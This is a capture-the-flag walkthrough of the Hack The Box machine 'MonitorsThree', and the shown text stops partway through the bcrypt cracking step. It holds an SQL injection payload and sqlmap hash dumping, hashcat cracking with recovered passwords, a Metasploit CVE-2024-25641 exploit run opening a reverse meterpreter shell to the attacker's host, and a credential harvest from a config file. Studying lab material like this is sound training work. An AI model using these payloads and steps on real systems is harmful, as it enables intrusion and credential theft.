# MonitorsThree

## Synopsis

**MonitorsThree** is a medium Linux machine created by **ruycr4ft** and **kavigihan**. The http service hosts the **monitorsthree.htb** domain. The vhost **cacti.monitorsthree.htb** runs **cacti** version **1.2.26**, which is vulnerable to the **CVE-2024-25641 arbitrary file write** vulnerability. The domain has a ***forget-password.php*** page which is vulnerable to **sql injection**, through which the **cacti** login credentials are obtained. **CVE-2024-25641** is exploited using those credentials, which gives us a shell as **www-data**. The cacti ***config file*** contains the **`mysql`** credentials. Logging into the **`mysql`** database gives us the **marcus** user's password hash; after cracking it we switch to the **marcus** user and fetch the ***id\_rsa*** for **`ssh`** login. marcus runs the **duplicati** service on port 8200; we can **bypass** the duplicati login and exploit it to gain a shell as **root**.

| OS    | Difficulty | Points | Release Date | Retired Date |
| ----- | ---------- | ------ | ------------ | ------------ |
| Linux | Medium     | 30     | 24-08-2024   | 18-01-2025   |

***

## OSINT

### Previous Machines

The previously released **Monitors** and **MonitorsTwo** machines are vulnerable to **sql injection** and **command injection**; in both, the **cacti** vhost or domain runs the **cacti** service and the user **marcus** is present.

{% tabs %}
{% tab title="Monitors" %}
[**https://www.hackthebox.com/machines/monitors**](https://www.hackthebox.com/machines/monitors)
{% endtab %}

{% tab title="MonitorsTwo" %}
[**https://www.hackthebox.com/machines/monitorstwo**](https://www.hackthebox.com/machines/monitorstwo)
{% endtab %}
{% endtabs %}

***

## Enumeration

### Nmap

The **`nmap`** scan finds the ssh and http services running.

```bash
nmap -Pn -sC -sV --min-rate=500 10.10.11.30 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 19:56 EST
Nmap scan report for 10.10.11.30
Host is up (1.9s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://monitorsthree.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.60 seconds
```

Add **monitorsthree.htb** and **cacti.monitorsthree.htb** to the ***/etc/hosts*** file.

### Web - monitorsthree.htb

**monitorsthree** provides networking solutions to businesses.

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FsPfse36MAE1D9e3TjgKo%2Fmonitorsthree-website.png?alt=media&#x26;token=248e2fb9-93c6-46e3-9f24-b14eac8564e0" alt=""><figcaption></figcaption></figure>

The **login page** provides a login form, and the **forget password** form is vulnerable to **sql injection**. It is also confirmed that the user **admin** is present, because the password reset instruction is sent successfully. The **payload** I have used for identifying the **sql injection** is given below.

```sql
admin'OR'1'='1
```

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2F67U6Mewhe74rlN3ElZRK%2Fsql_injection.png?alt=media&#x26;token=6d82a54e-6add-48a6-8452-7cee2797cbf8" alt=""><figcaption></figcaption></figure>

The syntax error confirms that the database is a **MariaDB** database.
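To show why the `admin'OR'1'='1` probe returns a hit and why a lone quote produces the syntax error, here is an added example (not code from the box or the writeup) with a string-concatenated username lookup next to its parameterised fix. It assumes an in-memory sqlite3 table standing in for `monitorsthree_db.users`, with the usernames from the later dump and constructed e-mail addresses.

```python
import sqlite3

# Constructed stand-in for monitorsthree_db.users: sqlite3 in memory instead of
# MariaDB, the usernames from the sqlmap dump, the e-mail addresses made up.
USERS = [
    ("janderson", "janderson@example.invalid"),
    ("admin", "admin@example.invalid"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> dict:
    """Forgot-password lookup built by string concatenation.

    The quote in admin'OR'1'='1 closes the literal, so the WHERE clause becomes
    username = 'admin' OR '1'='1' and every row matches; a lone trailing quote
    leaves an unterminated literal and the database answers with a syntax error.
    """
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return {"error": str(exc), "matched": []}
    return {"error": None, "matched": [row[0] for row in rows]}


def find_user_safe(conn: sqlite3.Connection, username: str) -> dict:
    """Same lookup with a bound parameter: the input is data, never SQL."""
    rows = conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()
    return {"error": None, "matched": [row[0] for row in rows]}


if __name__ == "__main__":
    db = make_db()
    for probe in ("admin", "admin'OR'1'='1", "admin'"):
        print(repr(probe), find_user_vulnerable(db, probe), find_user_safe(db, probe))
```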

### Web - cacti.monitorsthree.htb

The cacti vhost is present and runs cacti version **1.2.26**, which is vulnerable to **CVE-2024-25641** and can be exploited using **`metasploit`** once we have the cacti login credentials.

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FLie5E18fH10U6ZDZhTjk%2Fcacti_login.png?alt=media&#x26;token=d24b2197-ce6f-4934-88b0-67bbac94ed1f" alt=""><figcaption></figcaption></figure>

***

## Exploit

### SQL Injection - forget-password

The **sql injection** found on the domain is exploited using **sqlmap** to obtain the cacti login credentials.

* Intercept the forget password request using **`burpsuite`**.

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FsNTaSgMLOEdwMqq0sqed%2Fburp_intercept.png?alt=media&#x26;token=f40fbe3b-02fe-4a92-9e5a-7a4886b88b7a" alt=""><figcaption></figcaption></figure>

* Copy and paste the request into a file (***request.txt***).

{% tabs %}
{% tab title="DBS enumeration" %}

```bash
sqlmap -r request.txt --batch --dbs 
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:40:43 /2025-01-14/

[07:40:43] [INFO] parsing HTTP request from 'request.txt'
[07:40:43] [INFO] testing connection to the target URL
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[07:40:55] [INFO] testing if the target URL content is stable
[07:41:04] [WARNING] POST parameter 'username' does not appear to be dynamic
[07:41:14] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[07:41:23] [INFO] testing for SQL injection on POST parameter 'username'
[07:41:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:42:00] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:42:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:42:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:43:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:44:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:45:10] [INFO] testing 'Generic inline queries'
[07:45:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[07:45:19] [WARNING] time-based comparison requires larger statistical model, please wait. (done)                                                                           
[07:45:25] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[07:46:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[07:46:50] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[07:47:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:49:04] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[07:49:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:49:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:51:53] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 8237 FROM (SELECT(SLEEP(5)))WsJa) AND 'uTpu'='uTpu
---
[07:53:45] [INFO] the back-end DBMS is MySQL
[07:53:45] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:54:15] [INFO] fetching database names
[07:54:15] [INFO] fetching number of databases
[07:54:15] [INFO] retrieved: 2
[07:55:49] [INFO] retrieved: information_schema
[08:34:47] [INFO] retrieved: monit
[08:49:33] [ERROR] invalid character detected. retrying..
orsthree_db
available databases [2]:
[*] information_schema
[*] monitorsthree_db

[09:13:10] [INFO] fetched data logged to text files under '/home/dexter/.local/share/sqlmap/output/monitorsthree.htb'

[*] ending @ 09:13:10 /2025-01-14/
```

{% endtab %}

{% tab title="User Table Dumping" %}

```bash
sqlmap -r request.txt --batch -T users -C username,password -D monitorsthree_db --time-sec=10 --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.12#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:00:24 /2025-01-15/

[03:00:24] [INFO] parsing HTTP request from 'request.txt'
[03:00:24] [INFO] resuming back-end DBMS 'mysql' 
[03:00:24] [INFO] testing connection to the target URL
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 8237 FROM (SELECT(SLEEP(10)))WsJa) AND 'uTpu'='uTpu
---
[03:00:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[03:00:38] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'monitorsthree_db'
[03:00:38] [INFO] fetching number of column(s) 'password,username' entries for table 'users' in database 'monitorsthree_db'
[03:00:38] [INFO] resumed: 4
[03:00:38] [INFO] resumed: 1e68b6eb86b45f6d92f8f292428f77ac
[03:00:38] [INFO] resumed: janderson
[03:00:39] [INFO] resumed: 31a181c8372e3afc59dab863430610e8
[03:00:39] [INFO] resuming partial value: admi
[03:00:39] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                                       
[03:06:59] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[03:07:58] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
n
[03:13:20] [INFO] retrieved: 633b683cc128fe244
[04:22:44] [ERROR] invalid character detected. retrying..
b
[04:30:04] [ERROR] invalid character detected. retrying..
^C^C
[04:33:13] [WARNING] Ctrl+C detected in dumping phase                                                                                                                       
[04:33:13] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[04:33:13] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[04:33:13] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[04:33:13] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[04:33:13] [INFO] starting 8 processes 
[04:33:18] [WARNING] no clear password(s) found                                                                                                                             
Database: monitorsthree_db
Table: users
[2 entries]
+-----------+----------------------------------+
| username  | password                         |
+-----------+----------------------------------+
| janderson | 1e68b6eb86b45f6d92f8f292428f77ac |
| admin     | 31a181c8372e3afc59dab863430610e8 |
+-----------+----------------------------------+

[04:33:18] [INFO] table 'monitorsthree_db.users' dumped to CSV file '/home/dexter/.local/share/sqlmap/output/monitorsthree.htb/dump/monitorsthree_db/users.csv'
[04:33:18] [INFO] fetched data logged to text files under '/home/dexter/.local/share/sqlmap/output/monitorsthree.htb'

[*] ending @ 04:33:18 /2025-01-15/
```

{% endtab %}
{% endtabs %}

{% hint style="info" %}
I terminated sqlmap during the user dump once I had extracted the admin hash.
{% endhint %}

The admin hash is crackable using **`hashcat`** and ***rockyou.txt***. It gives us the credentials for cacti.

```bash
hashcat -a 0 -m 0 31a181c8372e3afc59dab863430610e8 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

31a181c8372e3afc59dab863430610e8:greencacti2001           
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 31a181c8372e3afc59dab863430610e8
Time.Started.....: Wed Jan 15 04:37:07 2025 (2 secs)
Time.Estimated...: Wed Jan 15 04:37:09 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  5462.9 kH/s (0.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7786496/14344385 (54.28%)
Rejected.........: 0/7786496 (0.00%)
Restore.Point....: 7782400/14344385 (54.25%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: grega1987tomazin -> green3484
Hardware.Mon.#1..: Temp: 57c Util: 32%

Started: Wed Jan 15 04:37:06 2025
Stopped: Wed Jan 15 04:37:10 2025

```

The **credentials** for cacti are **admin:greencacti2001**.

## Foothold

### Shell - www-data

The gained **credentials** can be used to exploit the **CVE-2024-25641** vulnerability. Use **`metasploit`** for exploiting the vulnerability. More details about the CVE can be found here.

{% embed url="https://www.cvedetails.com/cve/CVE-2024-25641/" %}

```bash
sudo msfdb run
[sudo] password for dexter: 

[msf](Jobs:0 Agents:0) >> use exploit/multi/http/cacti_package_import_rce
[*] Using configured payload php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> show options

Module options (exploit/multi/http/cacti_package_import_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /cacti           yes       The base URI of Cacti
   USERNAME   admin            yes       User to login with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set PASSWORD greencacti2001
PASSWORD => greencacti2001
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set RHOSTS tun0
RHOSTS => tun0
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set RHOSTS 10.10.11.30
RHOSTS => 10.10.11.30
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set LHOST tun0
LHOST => 10.10.16.17
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set LPORT 8443
LPORT => 8443
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set VHOST cacti.monitorsthree.htb
VHOST => cacti.monitorsthree.htb
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> exploit
[*] Started reverse TCP handler on 10.10.16.17:8443 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `admin` and password `greencacti2001`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Sending stage (40004 bytes) to 10.10.11.30
[+] Deleted /var/www/html/cacti/resource/WjGjZHBPj.php
[*] Meterpreter session 1 opened (10.10.16.17:8443 -> 10.10.11.30:46276) at 2025-01-14 20:47:43 -0500

(Meterpreter 1)(/var/www/html/cacti/resource) >
```

***

## Privilege Escalation

### Pillaging - www-data \[user]

**www-data** can read the cacti ***config file***, which contains the password for **`mysql`**, and the **user\_auth** table contains the user **marcus**'s hash, which is crackable using the ***rockyou.txt*** wordlist.

{% tabs %}
{% tab title="Config File" %}

```bash
(Meterpreter 1)(/var/www/html/cacti/resource) > cd ../include
(Meterpreter 1)(/var/www/html/cacti/include) > cat config.php
----- SNIP -----
$database_type     = 'mysql';
$database_default  = 'cacti';
$database_hostname = 'localhost';
$database_username = 'cactiuser';
$database_password = 'cactiuser';
$database_port     = '3306';
$database_retries  = 5;
$database_ssl      = false;
$database_ssl_key  = '';
$database_ssl_cert = '';
$database_ssl_ca   = '';
$database_persist  = false;
----- SNIP -----
(Meterpreter 1)(/var/www/html/cacti/include) > shell
Process 15797 created.
Channel 0 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

{% endtab %}

{% tab title="user\_auth" %}

```bash
(Meterpreter 1)(/var/www/html/cacti/include) > shell
Process 15797 created.
Channel 0 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@monitorsthree:~/html/cacti/include$ mysql -u cactiuser -p cacti
mysql -u cactiuser -p cacti
Enter password: cactiuser

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 21843
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [cacti]> USE cacti;
USE cacti;
Database changed
MariaDB [cacti]> SHOW TABLES;
SHOW TABLES;
+-------------------------------------+
| Tables_in_cacti                     |
+-------------------------------------+
| aggregate_graph_templates           |
| aggregate_graph_templates_graph     |
| aggregate_graph_templates_item      |
| aggregate_graphs                    |
| aggregate_graphs_graph_item         |
| aggregate_graphs_items              |
| automation_devices                  |
| automation_graph_rule_items         |
| automation_graph_rules              |
| automation_ips                      |
| automation_match_rule_items         |
| automation_networks                 |
| automation_processes                |
| automation_snmp                     |
| automation_snmp_items               |
| automation_templates                |
| automation_tree_rule_items          |
| automation_tree_rules               |
| cdef                                |
| cdef_items                          |
| color_template_items                |
| color_templates                     |
| colors                              |
| data_debug                          |
| data_input                          |
| data_input_data                     |
| data_input_fields                   |
| data_local                          |
| data_source_profiles                |
| data_source_profiles_cf             |
| data_source_profiles_rra            |
| data_source_purge_action            |
| data_source_purge_temp              |
| data_source_stats_daily             |
| data_source_stats_hourly            |
| data_source_stats_hourly_cache      |
| data_source_stats_hourly_last       |
| data_source_stats_monthly           |
| data_source_stats_weekly            |
| data_source_stats_yearly            |
| data_template                       |
| data_template_data                  |
| data_template_rrd                   |
| external_links                      |
| graph_local                         |
| graph_template_input                |
| graph_template_input_defs           |
| graph_templates                     |
| graph_templates_gprint              |
| graph_templates_graph               |
| graph_templates_item                |
| graph_tree                          |
| graph_tree_items                    |
| host                                |
| host_graph                          |
| host_snmp_cache                     |
| host_snmp_query                     |
| host_template                       |
| host_template_graph                 |
| host_template_snmp_query            |
| plugin_config                       |
| plugin_db_changes                   |
| plugin_hooks                        |
| plugin_realms                       |
| poller                              |
| poller_command                      |
| poller_data_template_field_mappings |
| poller_item                         |
| poller_output                       |
| poller_output_boost                 |
| poller_output_boost_local_data_ids  |
| poller_output_boost_processes       |
| poller_output_realtime              |
| poller_reindex                      |
| poller_resource_cache               |
| poller_time                         |
| processes                           |
| reports                             |
| reports_items                       |
| rrdcheck                            |
| sessions                            |
| settings                            |
| settings_tree                       |
| settings_user                       |
| settings_user_group                 |
| sites                               |
| snmp_query                          |
| snmp_query_graph                    |
| snmp_query_graph_rrd                |
| snmp_query_graph_rrd_sv             |
| snmp_query_graph_sv                 |
| snmpagent_cache                     |
| snmpagent_cache_notifications       |
| snmpagent_cache_textual_conventions |
| snmpagent_managers                  |
| snmpagent_managers_notifications    |
| snmpagent_mibs                      |
| snmpagent_notifications_log         |
| user_auth                           |
| user_auth_cache                     |
| user_auth_group                     |
| user_auth_group_members             |
| user_auth_group_perms               |
| user_auth_group_realm               |
| user_auth_perms                     |
| user_auth_realm                     |
| user_auth_row_cache                 |
| user_domains                        |
| user_domains_ldap                   |
| user_log                            |
| vdef                                |
| vdef_items                          |
| version                             |
+-------------------------------------+
113 rows in set (0.001 sec)

MariaDB [cacti]> SELECT * FROM user_auth;
SELECT * FROM user_auth;
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
| id | username | password                                                     | realm | full_name     | email_address            | must_change_password | password_change | show_tree | show_list | show_preview | graph_settings | login_opts | policy_graphs | policy_trees | policy_hosts | policy_graph_templates | enabled | lastchange | lastlogin | password_history | locked | failed_attempts | lastfail | reset_perms |
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
|  1 | admin    | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G |     0 | Administrator | marcus@monitorsthree.htb |                      |                 | on        | on        | on           | on             |          2 |             1 |            1 |            1 |                      1 | on      |         -1 |        -1 | -1               |        |               0 |        0 |   436423766 |
|  3 | guest    | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu |     0 | Guest Account | guest@monitorsthree.htb  |                      |                 | on        | on        | on           |                |          1 |             1 |            1 |            1 |                      1 |         |         -1 |        -1 | -1               |        |               0 |        0 |  3774379591 |
|  4 | marcus   | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK |     0 | Marcus        | marcus@monitorsthree.htb |                      | on              | on        | on        | on           | on             |          1 |             1 |            1 |            1 |                      1 | on      |         -1 |        -1 |                  |        |               0 |        0 |  1677427318 |
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
3 rows in set (0.000 sec)

MariaDB [cacti]> 

```

{% endtab %}
{% endtabs %}
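As an added defender-side check (not part of the writeup), the script below parses the `$database_*` assignments of a cacti-style `config.php` and flags the two weaknesses visible above: a database password equal to the username and a config file readable by every local user. The sample config, its temporary file and the `audit_config` helper are all constructed here.

```python
import os
import re
import stat
import tempfile

# Constructed sample in the shape of cacti's include/config.php as shown in the
# writeup (same keys and values; the password deliberately equals the username).
SAMPLE_CONFIG = """<?php
$database_type     = 'mysql';
$database_default  = 'cacti';
$database_hostname = 'localhost';
$database_username = 'cactiuser';
$database_password = 'cactiuser';
$database_port     = '3306';
"""

# Matches single-quoted PHP assignments such as  $database_password = 'x';
ASSIGN_RE = re.compile(r"^\s*\$(database_\w+)\s*=\s*'([^']*)'\s*;", re.MULTILINE)


def parse_db_settings(text: str) -> dict:
    """Return the quoted $database_* settings of a config.php as a dict."""
    return dict(ASSIGN_RE.findall(text))


def audit_config(path: str) -> list:
    """Return a list of findings for the config at `path` (empty means clean)."""
    findings = []
    with open(path, encoding="utf-8") as fh:
        settings = parse_db_settings(fh.read())

    user = settings.get("database_username", "")
    password = settings.get("database_password", "")
    if not password:
        findings.append("empty database password")
    elif password == user:
        # cactiuser/cactiuser is exactly the pair exposed on the box
        findings.append("database password equals username")

    # The web server account must read the file, but "other" never needs to.
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        findings.append(f"config readable by all local users (mode {mode:04o})")
    return findings


def write_sample(mode: int = 0o644) -> str:
    """Write SAMPLE_CONFIG to a temp file with the given mode; returns its path."""
    fd, path = tempfile.mkstemp(suffix=".php")
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_CONFIG)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    for finding in audit_config(write_sample()):
        print("[!]", finding)
```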

### Shell - marcus

Crack the hash using **`hashcat`** (mode 3200, bcrypt).

```bash
hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK:12345678910
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: hash
Time.Started.....: Tue Jan 14 22:34:55 2025 (6 mins, 4 secs)
Time.Estimated...: Fri Jan 17 09:02:00 2025 (2 days, 10 hours)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      136 H/s (7.20ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/3 (33.33%) Digests (total), 1/3 (33.33%) Digests (new), 1/3 (33.33%) Salts
Progress.........: 73792/43033155 (0.17%)
Rejected.........: 0/73792 (0.00%)
Restore.Point....: 24576/14344385 (0.17%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:256-272
Candidate.Engine.: Device Generator
Candidates.#1....: 280690 -> 020693
Hardware.Mon.#1..: Temp: 85c Util: 92%

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => q

                                                          
Session..........: hashcat
